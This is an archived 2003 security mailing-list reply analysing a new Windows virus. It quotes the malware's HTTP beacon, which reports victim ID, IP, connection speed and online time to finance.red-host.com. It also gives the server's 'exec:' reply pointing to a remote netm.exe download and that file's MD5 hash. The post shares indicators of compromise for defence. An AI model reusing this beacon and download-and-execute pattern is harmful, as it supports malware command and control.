lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <Pine.SGI.4.56.0311251351350.4023@bedivere.smharr4.dnsalias.net>
From: security at smharr4.dnsalias.net (Steven Harrison)
Subject: New virus

On Tue, 25 Nov 2003, Lorenzo Hernandez Garcia-Hierro wrote:

> Hi,
> Look this line:
> GET /events.php?%s HTTP/1.1
> Accept: */*
> Connection: Keep-Alive
> Host: finance.red-host.com
> id=%s&ip=%s&speed=%d&timeonline=%d
> finance.red-host.com
> so imagine this:
> id=[autonumeric ]&ip=[internet address by gestaddrbyhost]&speed=[connection
> speed]&timeonline=[seconds/minutes]

Just for fun, I pointed my web browser at
http://finance.red-host.com/events.php and all I got back was:

exec:http://wendy35.phpwebhosting.com/netm.exe

I retrieved that file, and running it 'strings' does imply that it will
contact a remote website. It could be a copy of the virus (I have yet to
recieve one yet), giving it another way to distribute itself, or for the
author to distribute improved versions.

Looking at the website at http://finance.red-host.com gives:

This account has been suspected by red-host.com administration.

The md5sum of that downloaded file is:

a930c6cb48b7bd66af7069c8ef90882f netm.exe

in case anyone wants to try and match it up with the files they have.


-- 
Steven Harrison
Unix Systems Administrator

N Statement lost, 0:1


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ